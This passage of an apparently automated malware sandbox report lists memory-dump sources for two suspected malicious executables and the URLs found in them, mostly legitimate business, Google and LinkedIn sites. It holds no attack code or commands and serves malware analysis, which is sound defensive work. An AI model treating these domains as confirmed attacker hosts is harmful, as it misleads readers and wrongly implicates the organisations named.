00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535596512.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.edimart.hu/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.647507609.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000014D9000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652811266.0000000003950000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652144923.00000000012B0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.fcwcvt.org/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api.js?render=explicit&#038;ver=3.3.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-CDTYFWBRBX
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533361544.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gpthink.com
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582969088.0000000005120000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709547478.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.iubenda.com/privacy-policy/423468
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.528744714.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.651017417.0000000007697000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652811266.0000000003950000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652144923.00000000012B0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530679965.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.jacomfg.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.650670746.0000000007689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.jacomfg.com/L7j
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.516949822.00000000015CD000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.516998654.00000000015CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.jenco.co.uk/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.kernsafe.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.linkedin.com/company/comsit-distribution-gmbh/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.linkedin.com/company/pohl-food-service
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.832259405.0000000007680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.lrsuk.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.738728504.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.532725762.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.532725762.00000000015C8000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.543802366.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641268349.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650619555.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.739674320.00000000076B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mqs.com.br/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.651017417.00000000076BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mqs.com.br/u
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.528726297.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652811266.0000000003950000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.647419378.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652144923.00000000012B0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530679965.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.naoi-a.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.543802366.000000000155D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.nunomira.com/
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.642131437.00000000012B0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.521508837.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.528726297.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.520474441.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.642925474.00000000012B0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652811266.0000000003950000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.519635310.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.643655921.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652144923.00000000012B0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olras.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.653416069.0000000003950000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.656622787.00000000017F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ora-ito.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.739674320.00000000076BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ora-ito.com/Y
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.739674320.00000000076B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ottospm.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.636738861.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pb-games.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 